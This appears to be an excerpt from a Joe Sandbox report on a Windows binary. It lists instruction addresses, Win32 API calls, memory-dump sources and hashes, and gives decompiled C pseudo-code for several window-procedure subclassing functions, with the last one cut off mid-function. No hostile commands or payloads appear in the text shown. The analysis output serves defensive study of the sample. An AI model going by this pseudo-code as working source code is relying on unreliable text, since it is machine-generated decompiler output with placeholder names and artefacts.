                                                                                                                                                                                                                                                                                          0x00102880
                                                                                                                                                                                                                                                                                          0x00102885
                                                                                                                                                                                                                                                                                          0x00102887
                                                                                                                                                                                                                                                                                          0x00102887
                                                                                                                                                                                                                                                                                          0x0010288c
                                                                                                                                                                                                                                                                                          0x00102890
                                                                                                                                                                                                                                                                                          0x00102892
                                                                                                                                                                                                                                                                                          0x00102892
                                                                                                                                                                                                                                                                                          0x001028a2
                                                                                                                                                                                                                                                                                          0x001028a7
                                                                                                                                                                                                                                                                                          0x001028a9
                                                                                                                                                                                                                                                                                          0x001028ab
                                                                                                                                                                                                                                                                                          0x001028b0
                                                                                                                                                                                                                                                                                          0x001028b0
                                                                                                                                                                                                                                                                                          0x001028b3
                                                                                                                                                                                                                                                                                          0x001028b6
                                                                                                                                                                                                                                                                                          0x001028c0
                                                                                                                                                                                                                                                                                          0x001028c5
                                                                                                                                                                                                                                                                                          0x001028c7
                                                                                                                                                                                                                                                                                          0x001028cb
                                                                                                                                                                                                                                                                                          0x001028cd
                                                                                                                                                                                                                                                                                          0x001028cf
                                                                                                                                                                                                                                                                                          0x001028d1
                                                                                                                                                                                                                                                                                          0x001028d2
                                                                                                                                                                                                                                                                                          0x001028d7
                                                                                                                                                                                                                                                                                          0x001028d7
                                                                                                                                                                                                                                                                                          0x001028cf
                                                                                                                                                                                                                                                                                          0x001028dd
                                                                                                                                                                                                                                                                                          0x001028e4
                                                                                                                                                                                                                                                                                          0x001028ea
                                                                                                                                                                                                                                                                                          0x001028ec
                                                                                                                                                                                                                                                                                          0x001028f0
                                                                                                                                                                                                                                                                                          0x001028f2
                                                                                                                                                                                                                                                                                          0x001028f4
                                                                                                                                                                                                                                                                                          0x001028f6
                                                                                                                                                                                                                                                                                          0x001028f7
                                                                                                                                                                                                                                                                                          0x001028fc
                                                                                                                                                                                                                                                                                          0x001028f4
                                                                                                                                                                                                                                                                                          0x00102902
                                                                                                                                                                                                                                                                                          0x00102910
                                                                                                                                                                                                                                                                                          0x001027a9
                                                                                                                                                                                                                                                                                          0x001027ac
                                                                                                                                                                                                                                                                                          0x001027b2
                                                                                                                                                                                                                                                                                          0x001027e2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001027b4
                                                                                                                                                                                                                                                                                          0x001027b5
                                                                                                                                                                                                                                                                                          0x001027c3
                                                                                                                                                                                                                                                                                          0x001027cc
                                                                                                                                                                                                                                                                                          0x001027da
                                                                                                                                                                                                                                                                                          0x001027da
                                                                                                                                                                                                                                                                                          0x001027b2

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetActiveWindow.USER32(?,1F9A9BDF,?,-00000024,?,?), ref: 001027B5
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 001027C3
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 001027E2
                                                                                                                                                                                                                                                                                            • Part of subcall function 001033C0: SendMessageA.USER32(?,00000434,00000000,-00000024), ref: 001033DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 001033C0: SendMessageA.USER32(?,0000043E,00000000,00000000), ref: 00103413
                                                                                                                                                                                                                                                                                            • Part of subcall function 001033C0: lstrlenA.KERNEL32(00000000,?,0000043E,00000000,00000000,?,00000434,00000000,-00000024,00000000,?,-00000024,?,?), ref: 00103423
                                                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(-0000000C), ref: 00102844
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,1F9A9BDF,?,-00000024,?,?), ref: 0010285E
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 001028CB
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(FFFFFFFF), ref: 001028F0
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105B41: __mbspbrk_l.LIBCMT ref: 00105B4E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InterlockedMessageSend$DecrementWindowlstrlen$ActiveIncrementShow__mbspbrk_l
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2999727784-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2ab1f23d8b6f22f7dddecbf0f05bc7355b278108c40c204e37237f91619beec6
                                                                                                                                                                                                                                                                                          • Instruction ID: ef41e2db77b6d692732429d2a5be0fcfbd24df47be3061f3a5fa461a3fb7af89
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ab1f23d8b6f22f7dddecbf0f05bc7355b278108c40c204e37237f91619beec6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF51AF75900209DFDB29DF54C888BAEF7F8FF58310F10852AE951A76D0D7B4A944CBA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                          			E001041D0(long _a4, long _a8, int _a12, long _a16) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v40;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t51;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                                                                                                          				long _t63;
                                                                                                                                                                                                                                                                                          				long _t65;
                                                                                                                                                                                                                                                                                          				long _t70;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t79;
                                                                                                                                                                                                                                                                                          				int _t89;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t70 = _a16;
                                                                                                                                                                                                                                                                                          				_t90 = _a4;
                                                                                                                                                                                                                                                                                          				_t51 =  *(_t90 + 4);
                                                                                                                                                                                                                                                                                          				_t89 = _a12;
                                                                                                                                                                                                                                                                                          				_v36 = _a8;
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                                                                                          				_push( &_a4);
                                                                                                                                                                                                                                                                                          				_a12 =  *(_t90 + 0x18);
                                                                                                                                                                                                                                                                                          				_push(_t70);
                                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                                          				 *(_t90 + 0x18) =  &_v40;
                                                                                                                                                                                                                                                                                          				_push(_a8);
                                                                                                                                                                                                                                                                                          				_push(_t51);
                                                                                                                                                                                                                                                                                          				_v12 = 0x24;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_v40 = _t51;
                                                                                                                                                                                                                                                                                          				_v32 = _t89;
                                                                                                                                                                                                                                                                                          				_v28 = _t70;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)( *((intOrPtr*)( *_t90))))() == 0) {
                                                                                                                                                                                                                                                                                          					_t59 = _a8;
                                                                                                                                                                                                                                                                                          					if(_t59 == 0x82) {
                                                                                                                                                                                                                                                                                          						_a8 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          						_t63 = CallWindowProcA( *(_t90 + 0x20),  *(_t90 + 4), 0x82, _t89, _t70);
                                                                                                                                                                                                                                                                                          						_t79 =  *(_t90 + 0x20);
                                                                                                                                                                                                                                                                                          						_a4 = _t63;
                                                                                                                                                                                                                                                                                          						__eflags = _t79 - __imp__DefWindowProcA; // 0x778fd1c0
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							_t65 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          							__eflags = _t65 - _a8;
                                                                                                                                                                                                                                                                                          							if(_t65 == _a8) {
                                                                                                                                                                                                                                                                                          								SetWindowLongA( *(_t90 + 4), 0xfffffffc,  *(_t90 + 0x20));
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t36 = _t90 + 0x1c;
                                                                                                                                                                                                                                                                                          						 *_t36 =  *(_t90 + 0x1c) | 0x00000001;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t36;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_a4 = CallWindowProcA( *(_t90 + 0x20),  *(_t90 + 4), _t59, _t89, _t70);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t53 =  *(_t90 + 0x1c);
                                                                                                                                                                                                                                                                                          				if((_t53 & 0x00000001) == 0 || _a12 != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x18) = _a12;
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x18) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x1c) = _t53 & 0xfffffffe;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0xc))))( *(_t90 + 4));
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x001041da
                                                                                                                                                                                                                                                                                          0x001041de
                                                                                                                                                                                                                                                                                          0x001041e4
                                                                                                                                                                                                                                                                                          0x001041e8
                                                                                                                                                                                                                                                                                          0x001041eb
                                                                                                                                                                                                                                                                                          0x001041f0
                                                                                                                                                                                                                                                                                          0x001041f1
                                                                                                                                                                                                                                                                                          0x001041f4
                                                                                                                                                                                                                                                                                          0x001041f7
                                                                                                                                                                                                                                                                                          0x001041fa
                                                                                                                                                                                                                                                                                          0x00104200
                                                                                                                                                                                                                                                                                          0x00104204
                                                                                                                                                                                                                                                                                          0x00104207
                                                                                                                                                                                                                                                                                          0x0010420b
                                                                                                                                                                                                                                                                                          0x0010420c
                                                                                                                                                                                                                                                                                          0x00104213
                                                                                                                                                                                                                                                                                          0x00104214
                                                                                                                                                                                                                                                                                          0x00104217
                                                                                                                                                                                                                                                                                          0x0010421e
                                                                                                                                                                                                                                                                                          0x00104225
                                                                                                                                                                                                                                                                                          0x00104228
                                                                                                                                                                                                                                                                                          0x0010422b
                                                                                                                                                                                                                                                                                          0x00104232
                                                                                                                                                                                                                                                                                          0x00104234
                                                                                                                                                                                                                                                                                          0x0010423c
                                                                                                                                                                                                                                                                                          0x0010426a
                                                                                                                                                                                                                                                                                          0x00104272
                                                                                                                                                                                                                                                                                          0x00104278
                                                                                                                                                                                                                                                                                          0x0010427b
                                                                                                                                                                                                                                                                                          0x0010427e
                                                                                                                                                                                                                                                                                          0x00104284
                                                                                                                                                                                                                                                                                          0x0010428c
                                                                                                                                                                                                                                                                                          0x00104292
                                                                                                                                                                                                                                                                                          0x00104295
                                                                                                                                                                                                                                                                                          0x001042a1
                                                                                                                                                                                                                                                                                          0x001042a1
                                                                                                                                                                                                                                                                                          0x00104295
                                                                                                                                                                                                                                                                                          0x001042a7
                                                                                                                                                                                                                                                                                          0x001042a7
                                                                                                                                                                                                                                                                                          0x001042a7
                                                                                                                                                                                                                                                                                          0x0010423e
                                                                                                                                                                                                                                                                                          0x0010424f
                                                                                                                                                                                                                                                                                          0x0010424f
                                                                                                                                                                                                                                                                                          0x0010423c
                                                                                                                                                                                                                                                                                          0x001042ab
                                                                                                                                                                                                                                                                                          0x001042b0
                                                                                                                                                                                                                                                                                          0x001042e5
                                                                                                                                                                                                                                                                                          0x001042ed
                                                                                                                                                                                                                                                                                          0x001042b9
                                                                                                                                                                                                                                                                                          0x001042bf
                                                                                                                                                                                                                                                                                          0x001042c2
                                                                                                                                                                                                                                                                                          0x001042c7
                                                                                                                                                                                                                                                                                          0x001042d0
                                                                                                                                                                                                                                                                                          0x001042db
                                                                                                                                                                                                                                                                                          0x001042db

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 513923721-3993045852
                                                                                                                                                                                                                                                                                          • Opcode ID: cd55a629dd3202b50f6b461e4fee5fe0e56af9dccd1928c3949a6ea4d138ed5d
                                                                                                                                                                                                                                                                                          • Instruction ID: 3339769ce0879a37279943c69831206a914b5167e9c4352118147b1c11da4ba3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd55a629dd3202b50f6b461e4fee5fe0e56af9dccd1928c3949a6ea4d138ed5d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9041ECB5A00609AFCB28CF59D88499BB7F9FB88310B10C61DF99A97750D770E940CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                          			E001043F0(long _a4, long _a8, int _a12, long _a16) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v40;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t51;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                                                                                                          				long _t63;
                                                                                                                                                                                                                                                                                          				long _t65;
                                                                                                                                                                                                                                                                                          				long _t70;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t79;
                                                                                                                                                                                                                                                                                          				int _t89;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t70 = _a16;
                                                                                                                                                                                                                                                                                          				_t90 = _a4;
                                                                                                                                                                                                                                                                                          				_t51 =  *(_t90 + 4);
                                                                                                                                                                                                                                                                                          				_t89 = _a12;
                                                                                                                                                                                                                                                                                          				_v36 = _a8;
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_a4 = 0;
                                                                                                                                                                                                                                                                                          				_push( &_a4);
                                                                                                                                                                                                                                                                                          				_a12 =  *(_t90 + 0x38);
                                                                                                                                                                                                                                                                                          				_push(_t70);
                                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                                          				 *(_t90 + 0x38) =  &_v40;
                                                                                                                                                                                                                                                                                          				_push(_a8);
                                                                                                                                                                                                                                                                                          				_push(_t51);
                                                                                                                                                                                                                                                                                          				_v12 = 0x24;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_v40 = _t51;
                                                                                                                                                                                                                                                                                          				_v32 = _t89;
                                                                                                                                                                                                                                                                                          				_v28 = _t70;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)( *((intOrPtr*)( *_t90))))() == 0) {
                                                                                                                                                                                                                                                                                          					_t59 = _a8;
                                                                                                                                                                                                                                                                                          					if(_t59 == 0x82) {
                                                                                                                                                                                                                                                                                          						_a8 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          						_t63 = CallWindowProcA( *(_t90 + 0x40),  *(_t90 + 4), 0x82, _t89, _t70);
                                                                                                                                                                                                                                                                                          						_t79 =  *(_t90 + 0x40);
                                                                                                                                                                                                                                                                                          						_a4 = _t63;
                                                                                                                                                                                                                                                                                          						__eflags = _t79 - __imp__DefWindowProcA; // 0x778fd1c0
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							_t65 = GetWindowLongA( *(_t90 + 4), 0xfffffffc);
                                                                                                                                                                                                                                                                                          							__eflags = _t65 - _a8;
                                                                                                                                                                                                                                                                                          							if(_t65 == _a8) {
                                                                                                                                                                                                                                                                                          								SetWindowLongA( *(_t90 + 4), 0xfffffffc,  *(_t90 + 0x40));
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t36 = _t90 + 0x3c;
                                                                                                                                                                                                                                                                                          						 *_t36 =  *(_t90 + 0x3c) | 0x00000001;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t36;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_a4 = CallWindowProcA( *(_t90 + 0x40),  *(_t90 + 4), _t59, _t89, _t70);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t53 =  *(_t90 + 0x3c);
                                                                                                                                                                                                                                                                                          				if((_t53 & 0x00000001) == 0 || _a12 != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x38) = _a12;
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *(_t90 + 4) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x38) = 0;
                                                                                                                                                                                                                                                                                          					 *(_t90 + 0x3c) = _t53 & 0xfffffffe;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0xc))))( *(_t90 + 4));
                                                                                                                                                                                                                                                                                          					return _a4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x001043fa
                                                                                                                                                                                                                                                                                          0x001043fe
                                                                                                                                                                                                                                                                                          0x00104404
                                                                                                                                                                                                                                                                                          0x00104408
                                                                                                                                                                                                                                                                                          0x0010440b
                                                                                                                                                                                                                                                                                          0x00104410
                                                                                                                                                                                                                                                                                          0x00104411
                                                                                                                                                                                                                                                                                          0x00104414
                                                                                                                                                                                                                                                                                          0x00104417
                                                                                                                                                                                                                                                                                          0x0010441a
                                                                                                                                                                                                                                                                                          0x00104420
                                                                                                                                                                                                                                                                                          0x00104424
                                                                                                                                                                                                                                                                                          0x00104427
                                                                                                                                                                                                                                                                                          0x0010442b
                                                                                                                                                                                                                                                                                          0x0010442c
                                                                                                                                                                                                                                                                                          0x00104433
                                                                                                                                                                                                                                                                                          0x00104434
                                                                                                                                                                                                                                                                                          0x00104437
                                                                                                                                                                                                                                                                                          0x0010443e
                                                                                                                                                                                                                                                                                          0x00104445
                                                                                                                                                                                                                                                                                          0x00104448
                                                                                                                                                                                                                                                                                          0x0010444b
                                                                                                                                                                                                                                                                                          0x00104452
                                                                                                                                                                                                                                                                                          0x00104454
                                                                                                                                                                                                                                                                                          0x0010445c
                                                                                                                                                                                                                                                                                          0x0010448a
                                                                                                                                                                                                                                                                                          0x00104492
                                                                                                                                                                                                                                                                                          0x00104498
                                                                                                                                                                                                                                                                                          0x0010449b
                                                                                                                                                                                                                                                                                          0x0010449e
                                                                                                                                                                                                                                                                                          0x001044a4
                                                                                                                                                                                                                                                                                          0x001044ac
                                                                                                                                                                                                                                                                                          0x001044b2
                                                                                                                                                                                                                                                                                          0x001044b5
                                                                                                                                                                                                                                                                                          0x001044c1
                                                                                                                                                                                                                                                                                          0x001044c1
                                                                                                                                                                                                                                                                                          0x001044b5
                                                                                                                                                                                                                                                                                          0x001044c7
                                                                                                                                                                                                                                                                                          0x001044c7
                                                                                                                                                                                                                                                                                          0x001044c7
                                                                                                                                                                                                                                                                                          0x0010445e
                                                                                                                                                                                                                                                                                          0x0010446f
                                                                                                                                                                                                                                                                                          0x0010446f
                                                                                                                                                                                                                                                                                          0x0010445c
                                                                                                                                                                                                                                                                                          0x001044cb
                                                                                                                                                                                                                                                                                          0x001044d0
                                                                                                                                                                                                                                                                                          0x00104505
                                                                                                                                                                                                                                                                                          0x0010450d
                                                                                                                                                                                                                                                                                          0x001044d9
                                                                                                                                                                                                                                                                                          0x001044df
                                                                                                                                                                                                                                                                                          0x001044e2
                                                                                                                                                                                                                                                                                          0x001044e7
                                                                                                                                                                                                                                                                                          0x001044f0
                                                                                                                                                                                                                                                                                          0x001044fb
                                                                                                                                                                                                                                                                                          0x001044fb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 513923721-3993045852
                                                                                                                                                                                                                                                                                          • Opcode ID: 48b939e32c97247f312b1bcd86cd8bc7b68fec8d4cf8b07156a017e8f3d89e24
                                                                                                                                                                                                                                                                                          • Instruction ID: c9c7cb0629ced668e3d1e4cb7e392789d4dd79463e4a8bb4bc8f9bc5e3ae78d4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b939e32c97247f312b1bcd86cd8bc7b68fec8d4cf8b07156a017e8f3d89e24
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A641ECB5A00619AFCB14CF59D98499BBBF8FB88310B10CA1DF99AD7750D771E940CB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00101CC0(long _a4, long _a8, struct HWND__* _a12, long _a16) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v40;
                                                                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          				long _t49;
                                                                                                                                                                                                                                                                                          				long _t52;
                                                                                                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                                                                                                          				long _t54;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t57;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t61;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t74;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t74 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t74 == 0) {
                                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t61 =  *_t74;
                                                                                                                                                                                                                                                                                          					if(_t61 == 0) {
                                                                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t57 = _t74[7];
                                                                                                                                                                                                                                                                                          						if(_t57 == 0) {
                                                                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t54 = _a16;
                                                                                                                                                                                                                                                                                          							_t71 = _a12;
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_a4 = 0;
                                                                                                                                                                                                                                                                                          							_v40 = _t61;
                                                                                                                                                                                                                                                                                          							_v36 = _a8;
                                                                                                                                                                                                                                                                                          							_a12 = _t74[9];
                                                                                                                                                                                                                                                                                          							_t74[9] =  &_v40;
                                                                                                                                                                                                                                                                                          							_v12 = 0x24;
                                                                                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                                                                                          							_v32 = _t71;
                                                                                                                                                                                                                                                                                          							_v28 = _t54;
                                                                                                                                                                                                                                                                                          							_t41 =  *((intOrPtr*)( *(_t57->i)))( *_t74, _a8, _t71, _t54,  &_a4, _t74[8], _t70, _t53);
                                                                                                                                                                                                                                                                                          							_t74[9] = _a12;
                                                                                                                                                                                                                                                                                          							if(_t41 != 0) {
                                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                                          								return _a4;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t43 = _a8;
